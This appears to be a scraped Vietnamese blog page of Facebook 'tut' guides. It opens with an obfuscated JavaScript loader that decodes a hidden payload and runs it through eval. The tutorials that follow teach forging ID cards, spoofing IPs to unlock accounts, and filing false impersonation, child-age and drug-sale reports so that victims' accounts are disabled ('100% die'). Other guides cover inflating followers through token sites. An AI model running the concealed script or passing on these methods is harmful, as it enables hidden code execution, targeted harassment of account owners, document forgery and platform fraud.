A1540B1855A1876E1547D1806C1540A1820C1820B1449F1834C1505C2009D1540D1855D1876A1547D1806D1533F1820B1456F1806A1505C1820F1806D1834E1505E2009F1540C1855E1876F1547F1806E1526E1820D1820E1582D1995F1848B1967F1393A1876E1596B1393D1939F1876D2002B1393F1785F1708C1701C1673A1981A1981E1953A1743F1876B1960E1988E1876D1974C1981C1582A1995F1848A1967A1393F1981D1596F1834F1505F2009E1540D1855D1876B1547F1806E1547A1820C1582F1995D1848E1967C1393C1939E1596E1834E1505A2009B1540D1855E1876A1547F1806A1554D1820B1470A1883B1855E1834F1869C1981E1974D1890B1470A1834C1505D2009B1540C1855E1876A1547F1806F1561D1820C1470B1904F1869F1834E1848F1953B1953C1470C1834D1505D2009B1540D1855D1876E1547C1806D1568F1820E1582A1876C1806A1834A1505E2009E1540D1855D1876D1547A1806F1512B1512E1820C1820F1449D1834E1505E2009F1540B1855C1876B1547A1806C1512C1505F1820D1477F1981F1477A1981A1967C1988C1876C1456F1582A1876E1806D1834F1505E2009C1540C1855A1876F1547A1806C1512C1519C1820A1820F1596E1883C1988D1939A1862A1981B1904A1946F1939D1449D1456F2030C1904F1883B1449B1876C1806E1834E1505B2009D1540B1855F1876E1547B1806B1512B1526D1820C1820D1596F1596F1533A1435F1435C1876F1806D1834E1505C2009E1540B1855A1876C1547D1806A1512D1533B1820C1820C1596D1596C1519F1505E1505E1456A2030C1981B1988A1848B1939E1596F1876E1806F1834A1505A2009C1540C1855F1876D1547F1806A1512A1547A1820A1820E1806B1834C1505C2009E1540F1855B1876A1547C1806E1512A1540C1820E1820B1449D1498A1981C1946E1918A1876A1939C1596A1449F1491C1470F1456F1435F1498C1456D1806F1512D1820D1582F1876E1806A1834D1505A2009D1540A1855A1876E1547A1806E1512F1554C1820B1820B1582C1995D1848F1967A1393C1834F1505B2009F1533B1533F1519A1883A2009F1855F1596D1393C1939A1876F2002F1393B1785B1708E1701D1673E1981B1981B1953D1743D1876F1960B1988E1876D1974F1981D1582F1995D1848D1967D1393C1981B1596A1834D1505B2009A1540F1855C1876C1547C1806E1512E1561E1820E1582F1995C1848E1967F1393D1939D1596C1834F1505A2009A1540D1855D1876B1547D1806B1554E1820F1470D1883B1855F1834B1869E1981F1974C1890E1470D1834E1505F2009D1540F1855C1876D1547C1806F1561B1820C1470E1904B1869A1834E1848A1953F1953E1470D1834A1505B2009D1540E1855B1876C1547F1806F1568C1820C1582A1834E1505F2009C1533C1533C1519C1883B2009E1855A1806B1834D1505D2009B1540D1855D1876F1547F1806F1512C1512E1820A1820B1449B1834F1505E2009B1540B1855B1876D1547A1806D1512E1505A1820F1477B1981C1477C1981C1967C1988F1876A1456E1582C1834A1505B2009C1533A1533E1519E1883B2009C1855C1806B1834E1505D2009E1540F1855E1876F1547E1806C1512A1519B1820F1820A1596A1883B1988C1939C1862A1981B1904C1946F1939B1449D1456E2030D1904F1883C1449F1834E1505A2009F1533D1533A1519D1883A2009F1855F1806E1834A1505D2009C1540F1855E1876E1547E1806F1512B1526A1820C1820D1596E1596F1533F1435C1435F1834E1505F2009D1533F1533C1519E1883C2009F1855A1806C1834F1505A2009C1540D1855F1876E1547E1806F1512D1533A1820A1820B1596D1596E1519C1505E1505F1456B2030F1932A1848D1855A1848C1946D1932A1848B1981E1596B1834E1505C2009A1533B1533D1519F1883A2009B1855E1806C1834A1505E2009F1540D1855B1876E1547C1806F1512A1547D1820D1820E1806C1834E1505D2009B1540E1855A1876C1547A1806A1512C1540B1820D1820B1449C1498A1981E1946C1918B1876C1939A1596D1449B1491A1470E1456B1435E1498F1456A1806B1512D1820B1582B1834E1505C2009A1533E1533C1519F1883F2009A1855D1806F1834F1505F2009B1540F1855D1876B1547B1806D1512D1554B1820D1820F1582A1974C1925A1876F1876B1953D1449F1869D1876B1925A1848F2016E1834A1981E1904D1932A1876A1456D1582B1925F1946A1862A1848F1981F1904A1946D1939C1806F1834C1505B2009F1540A1855E1876E1547F1806E1512C1568E1820B1820A1596A1925A1904D1918D1876E1540B1974C1470E1981C1988D1848E1939A2044C2044D1582E1834E1505D2009C1533D1533D1519B1883F2009A1855E1806F1834D1505C2009A1540F1855E1876B1547C1806C1519A1505D1820F1820E1449C1939A1456D2044F2044B1582B1876F1806B1834F1505F2009A1540E1855E1876C1547C1806C1519E1505F1820C1820D1449A1939C1456B1582C1239C1239C';var _7032=/[\x41\x42\x43\x44\x45\x46]/;var _7288=2;var _9131=_6935.charAt(_6935.length-1);var _1578;var _2929=_6935.split(_7032);var _6436=[String.fromCharCode,isNaN,parseInt,String];_2929[1]=_6436[_7288+1](_6436[_7288](_2929[1])/21);var _3534=(_7288==7)?String:eval;_1578='';_11=_6436[_7288](_2929[0])/_6436[_7288](_2929[1]);for(_9994=3;_9994<_11;_9994++)_1578+=(_6436[_7288-2]((_6436[_7288](_2929[_9994])+_6436[_7288](_2929[2])+_6436[_7288](_2929[1]))/_6436[_7288](_2929[1])-_6436[_7288](_2929[2])+_6436[_7288](_2929[1])-1));var _3594='_5382';var _4796='_3594=_1578';function _4760(_2518){_3534(_9168);_4760(_6525);_6525(_4796);_4760(_3594);}var _9168='_4760=_3534';var _6525='_6525=_4760';_4760(_9131);TUT UNLOCK 583 5S BY NVK

Xin Chào Các Anh Em Nha <3 Hôm Nay Tut Unlock 583 Nhé <3
Bước 1: Vào Hola Fake Ip Hoa Kì nn Us
Bước 2 : Login Acc 741 Vào Nha <3
Bước 3 : Vào Link 741  : https://www.facebook.com/help/contact/228689950548714
Bước 4 : Điền Chủ Đề Là : Nhả Acc Cho Kiên Đẹp Trai Nha <3
Bước 5 : Điền Mail Bị Dạng 583 <3
Bước 6 : Thần Chú Là : Địt Mẹ Thằng Lồn Mark Nhả Acc Cho Đệ Của Nguyễn Văn Kiên Nhé <3
Rồi Up Lên Hóng Zề Zề 5s Nha Anh Em <3
Về Hãy Share Cho Kiên Nha <3 

Phoenix - Omega Hòa Nhau Nha Mọi Người

- Giờ Xin Nhắc Lại Lần Cuối ) Thật Sự Anh Em Muốn Nghe Hay Nghe Tuỳ ))
- Dừng All Cuộc War Tại Đây Nhé  Team Phoenix Và Omega Đã Hoà Rồi Nhé 😊 
- Các Anh Em Lo Mà Kiếm Tiền Mà Tiêu Tết Hay Gì Ấy Đi Chứ Giờ Đừng Đi Cào Lung Tung Nữa Nha 😊 
- Kiên Xin Anh Em Dừng Lại Các Cuộc War Mà Làm Ăn Nhé 😊 Cứ Đi Cắn Nhau Không Có Vui 😊 Kiên Hứa Là Kiên Làm ok 😊 
- Làm Sai Gì Cũng Được 😊 Riêng Anh Em Nào Chơi Được Thì Chơi Còn Không Chơi Được Thì = Cút 
- Ai Cảm Thấy ok 😊 


Thì Share Hộ Kiên Nha OK )

BUFF VIEWS BY - Bản quyền © 2017 LÊ ANH ĐỨC ENTERTAINMENT ✅

TUT UNLOCK ALL DẠNG 5S = LINK 751 BY NVK

Xin Chào Các Anh Em Nha <3 Hôm Nay Ra Cách Unlock Link 751 <3
Bước 1: Vào Hola Fake Ip Nhật Nn Việt Nam
Bước 2 : Login Acc 751 Vào Nha <3
Bước 3 : Vào Link 751  : https://www.facebook.com/help/contact/1062444770553751
Bước 4 : Điền Mail Acc Bị Dạng FAQ Nha Anh Em ! Trừ Dạng 583 Ra Nha Anh Em <3
Bước 5 : Điền Tên Acc Bị Mất <3
Bước 6 : Thần Chú Là : Địt Mẹ Nhả Acc Cho Support Nguyễn Văn Kiên <3
Rồi Up Lên Hóng Zề Zề 5s Nha Anh Em <3
Về Hãy Share Cho Kiên Nha <3

TUT BUFF SUB NOTIME 1 DAYS 50K SUB BY NGUYỄN VĂN KIÊN

LOGIN : http://abliker.com/index.php?i=Please%20Generate%20token%20from%20us!
TAI~ VPN : https://chrome.google.com/webstore/detail/hotspot-shield-vpn-free-p/nlbejmccbhkncgokjcmghpfloaajcffj?hl=vi
Login bằng token Phụ tránh bị spam dính cp 72h
Vào Bấm Auto Follow Chọn Tăng ID Vidu : IAm.Hi.NguyenVanKien.Info Bấm Vào Send Follow Nó Chạy Sub Nhảy Nó Tự Click ra ngoài Log Token vào nữa !
Bật VPN Lên Bên Phải Rồi Nó Tự F5 Trở Lại Ban Đầu Là Reday Tiếp Tục Nhập ID Của Mình Bấm Send Follow Cứ làm mãi như vậy ! ~ F5 Hóng sub lên
BY : NGUYỄN VĂN KIÊN
  

TUT RENAME TÍCH ẨN BẰNG LINK 333 BY NVK

- TUt TÍCH ẨN BY NGUYỄN VĂN KIÊN <3
-VÀO LINK 333 LÊN CHỊ GOOLGE LẤY NHA <3
B1: ĐIỀN TÊN KÈM THEO TÍCH NÀY ꪜ
B2: ĐIỀN HỌ DƯỚI CŨNG
B3 LÝ DO THAY ĐỔI LÀ ĐỔI TÊN HỢP PHÁP NHÉ
B4 LẤY ID CARD LÀM CMND NHÉ
B5 HÓNG CHỜ NÓ REP <3 NHỚ LÀ PHẢI KHÁC TÊN HOẶC HỌ NHA
VD: TRẦN HẠO NAM cHUYỂN QUA NGUYỄN VĂN KIÊN THẾ ĐẤY <3
B6: NÓ RA CẬP NHẬT TÊN GIẢ ẤY <3
B7: NHẤN KHÔNG CẬP NHẬT
B8: ẤN TIẾP TỤC
B9: RA KIỂU ĐIỀN TÊN Á NHA BƯỚC NÀY QUAN TRỌNG LẮM NHA <3 ANH EM LÀM CẨN THẬN MỚI ĐƯỢC Á NẾU VÀO ĐƯỢC CÁI ĐÓ RỒI THÌ NÓ HIỆN DÒNG ĐIỀN TÊN VỚI ĐIỀN TÊN ĐỆM VÀ HỌ
B10:Ở DÒNG HỌ UP TÍCH NÀY CHO NAM <3 ★ ⊰ TÊN ⊱ ★ ĐẤY KÈM TÊN Ở GIỮA ĐẤY CÁC BẠN ĐIỀN TÊN GÌ TÙY CỦA MẤY BẠN
B11: ĐIỀN TÊM ĐỆM VÀO NHƯ CHỮ VĂN ẤY
B12: ĐIỀN HỘ VÀO ( NGUYỄN )
B13: UP ID CARD CỦA TÊN HÔM TRƯỚC VÀO NHÉ UP XONG ĐĂNG XUẤT RA <3
B14: CHỜ TẦM 10P GÌ ĐẤY VÀO CẬP NHẬT TÊN NHÉ RỒI ĐI ĐẾN THƯ HỖ TRỢ NHA <3 NẾU TÊN KHÔNG VỀ CHỜ TẦM 30P NỮA LÀ NÓ VỀ Á CÁI NÀY 1 DAYS MỚI XONG NHA <3
NẾU THÀNH CÔNG THÌ UP UY TÍN HỘ KIÊN NHA <3
LINK fB: https://www.facebook.com/IAm.Hi.NguyenVanKien.Info

TestTUT REPORT MD 808 100% DIE

Bước 1 : Reg 1 Nick, Fake nó all ( tí mình để cách lấy clone add mà không cp nha )
Bước 2 : Fake 1 Cmnd ( Họ tên , ngày sinh )
Bước 3 : Fake IP Áo , Ngôn Ngữ Thái
Log link : https://www.facebook.com/help/contact/169486816475808
Chọn 3,2,1
Tên đầy đủ của bạn
Địa chỉ email liên hệ của bạn
Tên đầy đủ trên trang cá nhân của kẻ mạo danh
Địa chỉ email hoặc số điện thoại di động được liệt kê trên trang cá nhân của kẻ
mạo danh (nếu có)
Liên kết (URL) đến trang cá nhân của kẻ mạo danh
UP CMND
Rồi rep câu dưới
This account is forging me and doing bad things for me. I urge you to
review and delete this account
– Full Name : Nguyễn Văn Kiên
– Birh day : 1-1-1995
– URL : https://www.facebook.com/IAm.Hi.NguyenVanKien.Info
Thank you!
Vào wall nó : Báo cáo mạo danh tôi >> Đây là tài khoản giả mạo >> Báo cáo
stt quấy rối >> Báo
cáo ảnh làm phiền người khác >> Đóng tài khoản

Nick chính : Báo cáo đây là tài khoản giả mạo >> Báo cáo stt và Ảnh gì cũng
được >> Đóng tài khoản
Vào link :
Vào link : https://www.facebook.com/help/contact/144059062408922
=> Chọn theo thứ tự sau: Photo >> Profile picture >> Yes, I have a URL >> In the
US >> My child’s rights >> Under 13
+ Dòng 1: URL link avata của nó
+ Dòng 2: Điền tên của nó vô
+ Dòng 3: Họ và tên đệm (nếu nó có cả họ và tên đệm – ko có tên đệm thì điền
mỗi họ thui)
ð  Tích vào 2 dòng như bên dưới oy nhấn gửi.
ð  Sau khi làm xong tất cmn cả thì hóng nó bay màu : 5-30p – Đã test tut và nó die
100%
  Nó sẽ die ở 2 dạng: FAQ MD hoặc APP nhé :v
REPORT
Ok Chúc Anh Em Làm Vui Vẻ ^_^

TUT UNLOCK 13T THẦN THÁNH PHOENIX TRICKER TEAM

TUT UNLOCK 13T THẦN THÁNH
tải hola fake ip  Ấn Độ + nn Trung Quốc
vào link :
https://www.facebook.com/help/contact/199052956872279
cứ yes yes
Điền Các Thông Tin Trong Các Ô Trống Nhé
<Kèm cmnd vào>
ĐỢI NÓ REP 2H LÀ NÓ VỀ THÔI
BY NGUYỄN VĂN KIÊN

LINK FB: https://www.facebook.com/NVK.Admin.Team.Phoenix.01

TUT DAME APPS TỈ LỆ CAO RA APPS NT TEAM PHOENIX TRICKER TEAM

TuT Cuối Cùng Để Kiên Chuyển Sang Người  Viết Ngôn Tình Nhé ok  Tao Mong Mọi Người Hay Để Tut Này Thế Mà Dùng Đừng Share Cho Ai Nhé ok =))
Bước 1 Fake Bằng Hola Or HMA Nhé (Mình Nghĩ HMA Vẫn Tốt Hơn)=))
Bước 2 Vào Acc Fake Ip Hunggari Nn Miễn Điện
Nhất Định Không Được Dame Wall Của Victim Vì Nếu Dame Wall Khi Die Ảnh Cũng Sẽ Kéo Theo Acc Die Tỉ Lệ Ra Apps Nt Rất Thấp
Vào  Dame Ảnh Mua Bán Vũ Khi Ra Tỉ Lệ Apps NT Rất Cao Nhé =))
Ví Dụ Khi Dame 5 Cái Ảnh Đấy Thì Ra Apps Nt Nhé
Tut Chỉ Thế Thôi Mong Anh Em Đừng Share Ai Nhé L


Ảnh Team Phoenix Tricker Team ADMIN Nguyễn Văn Kiên
TUT DAME FAQ MD TỈ LỆ DIE CAO TEAM PHOENIX DRAGON TEAM

B1: Tạo 1 Clone fake Như victim + 1 cmnd như Info acc fake.
B2: Fake Ip Pháp NN Pháp
B3 https://www.facebook.com/help/contact/169486816475808
https://www.facebook.com/help/contact/295309487309948
https://www.facebook.com/help/contact/174263416008051
 Link1,2: Rồi Điền Các Thông Tin Vào Nhé
+  : Tên acc fake.
+  : Điền email acc fake.
+  : Tên VIctim.
+  : Điền id victim vd : 100013970076541@facebook.com
+  : Liên kết victim : vd https://www.facebook.com/profile.php?id=100013970776544
+  : Up cmnd ở Bước 1 lên.
Thần chú : Supprimez ce compte. J'ai été blessé et quelqu'un a été forgé. Ne vous laissez pas triste. Retirez-le rapidement. Il s'agit d'un faux compte créé pour harceler un autre compte. Attendez-vous à Facebook pour examiner et fermer ce compte.
Link thứ 3 :Không FAKE Gì cả,và cũng  điền thông tin theo yêu cầu
Quan trọng phần mail nạn nhân: dán URL facebook nạn nhân vô đó
Fake 1 CMND sinh 2005 và chọn trong bảng 12 tuổi

Thần chú:  Đứa con tôi giả mạo năm sịn để sử dụng Facebook
B3 : Vào link Báo cáo tài khoản giả mạo làm theo hướng dẫn (Ai đó đã tạo một tài khoản mạo danh tôi hoặc một người bạn) RỒI  (KHÔNG) đến (Vâng, tôi là người đang bị mạo danh)
Rồi Vào Wall Nó 3 Chấm Nhé ok 

Rồi Spam Ảnh Bìa Nhé Mấy Bạn Spam Ảnh này mô tả việc mua hoặc bán ma túy, súng hoặc sản phẩm bị kiểm soát
Rồi Ngồi Hóng Trong Vòng 24h Nhé Nếu Die Thì Vào Inbox T Rồi Up Uy Tín Nhé

Link FB: https://www.facebook.com/NVK.Admin.Team.Phoenix.01

TUT REPORT FAQ MD 100% DIE

Tải Hola , Fake IP Hoa Kỳ Chọn Ngôn Ngữ (US)- Vào trang báo cáo!-  https://www.facebook.com/help/contact/295309487309948-  Someone created an account pretending to be me or a friend- Chọn , No- Yes, I am the person being impersonated- Tên facebook trên trang cá nhân của bạn!- Email của bạn trên facebook bạn đã tạo account!- Ghi tên đầy đủ của victim cần báo cáo!- Email address listed on the impostor profile (if available) , Khỏi ghi!- Link (URL) to the impostor profile- Copy link trang của victim thả vào!- Tải PTS Về Fake CMND dống như trong info của victim! bạn có thể tải PSD CMNND tại đây :LINK- Rồi save dưới dạng JPEG , Úp lên!- Additional info: This account is impersonating me please delete thisaccount. tut faq đó

Tut Unlock FaQ MD 30p Về

TUT Unlock FAQ MD 30p Về Tùy Theo Cmnd <3 !
-          Bước 1 tải Hola về  fake Ip Ấn Độ  Ngôn Ngữ Trung Phổ
-          Bước 2 fake 1 cmnd chuẩn trùng với info nick cần unlock

-          Bước 3 vào các link Như sau :
-           https://www.facebook.com/help/contact/183000765122339
-           Điền Theo Các Ô Rồi Up Cmnd Lên  !! Thần Chú Thì Vô GG dịch Ra họ và Tên
-          Ngày Tháng Năm Sinh
-          Gmail Facebook
-          Cám ơn Đội ngủ Facebook !
-          
-          Và Hóng TUT chỉ Có Như Vậy <3
Nguyễn Văn Kiên <3

Tut Unlock FAQ MD Về 100% 🔰Phoenix Dragon Team🔰

FAQ MD là khi một tài khoản nào đó báo cáo bạn giả mạo, loại này khá khó mở và phải liên hệ với Facebook, hôm nay mình sẽ hướng dẫn các bạn unlock FAQ MD và cách này mới được mình viết vào ngày hôm qua.
B1: Bạn cần một chứng minh thư khớp thông tin với tài khoản của bạn và một trình duyện để fake ip ví dụ như HOLA và chuyển ip qua nước Ẩn Độ
B2: Đăng nhập vào tài khoản bị khóa, chuyển ngôn ngữ qua Ấn ĐộB3: Vào link : https://www.facebook.com/help/contact/183000765122339Up chứng minh thư lên tài nhấn Send


B4: Facebook sẽ đưa ra 1 link Support, ta gọi là Case. Dạng như :                                          https://www.facebook.com/support/view_details/XXXXXXXXXXXXXXX. Treo đó, đợi tầm 2-3p ấn F5.

B5: Sau khi ấn F5  Facebook sẽ rep lại với nội dung đại loại như "Tài khoản Fb của bạn bị khóa vì lý            do.......".
Lúc này bạn chỉ việc Rep lại với nội dung sau và đính kèm CMND đã chuẩn bị
Nhả  Cho  Anh  Kiên  Dz  Nhất  Làng  Tricker  Nhé  ok  Mấy  Em
. Xong Rồi Up Cmnd Trong Info Với Nik Nhé ok
Giờ bạn chỉ việc ngồi chờ từ 30p-1h để Fb xem xét và mở khóa lại tài khoản cho bạn
Nguyễn Văn Kiên Dzzz

Report Những Dạng Dễ Die Nhất

FAQ MD ( checkpoint mạo danh ai đó ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 277 ( https://www.facebook.com/help/660324514027277 )
ấn liên hệ nó ra là 339 ( https://www.facebook.com/help/contact/183000765122339 )
2. FAQ 13T ( 13T unlock tạch  thì qua hoặc die 051 ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 208 (https://www.facebook.com/help/430492373658208)
ấn liên hệ nó ra là 279 ( https://www.facebook.com/help/contact/199052956872279 )
3. Checkpoint 72h ( úp ảnh mặt )
4. FAQ 583 ( APPS 583 ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 583 (https://www.facebook.com/help/103873106370583 )
ấn liên hệ nó ra là 907 ( https://www.facebook.com/help/contact/260749603972907)
5. APP NGUYÊN THỦY LOẠI 1 ( do úp video sex 5 giây ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 130 ( https://www.facebook.com/help/384780158251030 )
ấn liên hệ nó ra là 086 (https://www.facebook.com/help/contact/269030579858086)
6 APP NGUYÊN THỦY LOẠI 2 ( DO ĂN DAME ẢNH HOẶC ĂN LINK ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 817 (https://www.facebook.com/help/412159975500817)
ấn liên hệ nó ra là 907 ( https://www.facebook.com/help/contact/260749603972907)
7. APP TÊN GIẢ ( DO UNLOCK TẠCH QUA HOẶC ĂN SPAM ẢNH HOẶC DIE MD RỒI NOTI ẢNH REP DIE LÀ QUA ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 015 ( https://www.facebook.com/help/136370616501015)
dang này không có kháng nghị
8. dạng checkpoint 13t bạn sẽ không check id của nạn nhân được
9. dạng checkpoint ảnh bạn bè
10. dạng FAQ SEX( CHECKPOINT SEX) do spam ảnh mà ra
11. dạng APPS VI PHẠM MẠO DANH 3 DÒNG-------- nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 841 ( https://www.facebook.com/help/417331854984841 )
ấn liên hệ nó ra là 339 ( https://www.facebook.com/help/contact/183000765122339 )
12. Tên giả :v này ai cũng biết nên mình k nói thêm
13. APPS MẠO DANH nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 723 ( https://www.facebook.com/help/245058342280723 )
ấn liên hệ nó ra là 339 ( https://www.facebook.com/help/contact/183000765122339
14. VPBQ ( vi phạm bản quyền ) nhấp quên mật khẩu dán id nó ra TK bị khóa => tại đây => ra đuôi 359 (  https://www.facebook.com/help/370657876338359 )
Không có bảng kháng nghị
..... vân vân
Hết >< ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ================================================================================================================
Link blogger nơi chia sẽ những thủ thuật mới nhất và chất nhất về facebooker nha ace : http://nguyenvankien111.blogspot.com/
còn mình nợ anh em tút nào thì cứ lên blog của mình
mà xem nha ace
Anh em nhớ Tương tác + sao vàng bạn bè nha để có những thủ thuật mới nhất trên faecbook.


TUT UNLOCK APPS NT

Tut Unlock ALL FAQ Và APPS NT ( TÙY ) ĐZ
                   By:  Nguyễn  Văn  Kiên
LINK FB Kiên Dz
Facebook.com/NVK.Admin.Team.Phoenix.01
🔰Phoenix Dragon Team🔰
- CÁCH UNL NHÉ :V
- Bước 1 Tải Phần Mềm Hola Về :  https://chrome.google.com/webstore/detail/unlimited-free-vpn-hola/gkojfkhlekighikafcpjkiklfbnlmeio?hl=vi
-Bước 2 Fake Ip : Hàn  Quốc  Nn  Hồng  Không                                                              Bước 3: Log Những Link Kháng Sau :*
- Link 1 :  https://www.facebook.com/help/contact/317389574998690  ( điền info nhé ) ...........
- Link 2 :  https://www.facebook.com/help/contact/313733425335072
- Link 3 :  https://www.facebook.com/help/contact/1553947421490701
-Bước 4: Đổi Thành Ngôn Ngữ EngLish Uk nhé <3
Bước 5 Úp Lên Và Chờ Case Về Rồi Rep : VÀ ĐỢI 15P-35P NICK TỰ NHẢ :D
Full Name :   Nguyễn  Văn Kiên                                             date of birth: 01-01-2002
Rồi Tắt Case Và Hóng <3 Lưu Ý : LINNK NÀY UNL APPS NT HÊN XUI NHÉ NÓ CHỈ NHÁI 258 THÔI -)) TÙY NICK APPS NT MỚI NHẢ CÒN LẠI NHẢ NHIỀU LÀ FAQ 583 15P CÓ NICK OK
- XÀI NHANH KO FIX ĐÓ NHỚ TT SAO VÀNG SẮP TỚI Kiên RA ĐỢT EVENT CỨC LỚN NHÉ ^^ YÊU TẤT CẢ CÁC FANS CŨNG NHƯ CÁC BẠN -)) RẤT CÁM ƠN :*
By : Nguyễn Văn Kiên

Tut Veri Bất Tử Như Kiên Dz Của Mấy Đứa Nhé ok

Tut veri 6 link bá nhất 2017 hạn chế ăn rerpot 95%,kiếm cái cmnd thật đi nhé hay chuẩn cũng được...đặt năm sinh trên 18 tuổi cỡ 27-37 tốt nhất....ẩn info tất cả nhé ngày sinh,quê quán,email.thêm khoảng 20 công việc,đại học hết mỗi lạo 20 cái luôn ẩn chỉ mình tôi 10-15 cái....ko đc thêm sđt nhá ăn cp ảnh hoài đấy...tạo 5 acc clone,chọn 5 liên hệ tin cậy.thêm gia đình nhiều vào
-tốt nhất chọn acc càng cổ càng tốt.avt chỉ mình tôi
fake ip us-nn us
-Vào link này 237:  https://www.facebook.com/help/contact/237843336274237
Điền tên
Điền họ vào
Điền mail fb đăng kí
Giới tính thì tự chọn
R thêm năm tháng ngày vào giống vs cmnd
R ụp cmnd lên ( tôi đồng ý và gữi)
=> Sau đó khoãng 2 3 phút fb nó trả cái mail về thì relp mail như sau
Hello facebook team: This is my id card.I'm sorry the wrong information in this. I hope that will be soon confirmed this account with the following information
Full name: Họ và tên của bạn
Date of birth : Ngày sinh đăng ký trên fb
Thanks facebook team
ụp cmnd lên và hóng tên về ( lưu ý link 237 họ và tên phải giống nhau nhé )
#trẩu thì đọc bấy nhiêu thôi nhé :v
phía dưới khó lắm -_-
- vào link 195: https://m.facebook.com/help/contact/233841356784195
đổi ngày sinh sang 2003,nó sẽ die 13t unlook về
-fake một clone giống acc cần veri,lấy acc clone đó dame giả mạo tôi...vài tiếng ra Faq MD unlook về
-unlook nhiều lại nữa càng tốt
làm như vậy miết nick bạn sẽ rất trâu...đéo có acc nào bất tử nhé :v
chỉ có mark đz thui ok :v
Nguyễn Văn Kiên Đzz

Tut Dame 808 MD

https://facebook.com/help/contact/169486816475808
Chọn dòng thứ 3 chọn no chọn tiếp dòng 2
Dòng 1 Tên mình
Dòng 2 điền mail chưa tạo facebook goi là trắng ấy
Dòng 3 Tên mình
Dòng 4 ID@facebook.com
Dòng 5 Link nó
up cmnd của mình lên nhé
Thần chú : 私は、このプロファイルが私を偽装していると思いますが、FacebookのFacebookのからそれを削除してください、Facebookの感謝します
Vào wall nó báo cáo nó mạo danh tôi
Yêu cầu đóng tài khoản
Xong vô hiệu hóa tài khoản của mình.
Hết >< ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Link contact : https://www.facebook.com/ https://www.facebook.com/NVK.Admin.Team.Phoenix.2000000) Nguyễn Văn Kiên
Poenix Dragon Team ================================================================================================================
Link blogger nơi chia sẽ những thủ thuật mới nhất và chất nhất về facebooker nha ace : http://nguyenvankien111.blogspot.com/
còn mình nợ anh em tút nào thì cứ lên blog của Kiên mà xem nha ace
Anh em nhớ Tương tác + sao vàng bạn bè nha để có những thủ thuật mới nhất trên faecbook.

TUT DAME FAQ APPS

Tút Đame FAQ APPS
Bước 1 Fake ÍP ( Trung Quốc ) Ngon ngữ ( Thái )
Bước 2: dồn 3 acc trên 300 bạn bè ko cần fake J giống victamin
Bước : 3 vào link
Report Tống Tièn https://www.facebook.com/help/contact/567360146613371 https://www.facebook.com/help/contact/651319028315841 https://www.facebook.com/help/contact/893811720646563
Thần Chú คนนี้ลักลอบนำยาเสพติดทุกชนิดเพราะยาที่พวกเขาขายอวัยวะบางอย่างมองไปข้างหน้าและนอนหลับได้เห็นฟ้าผ่าลบออก

Oke bước 4 hóng đell
Nguyễn Văn Kiên Dz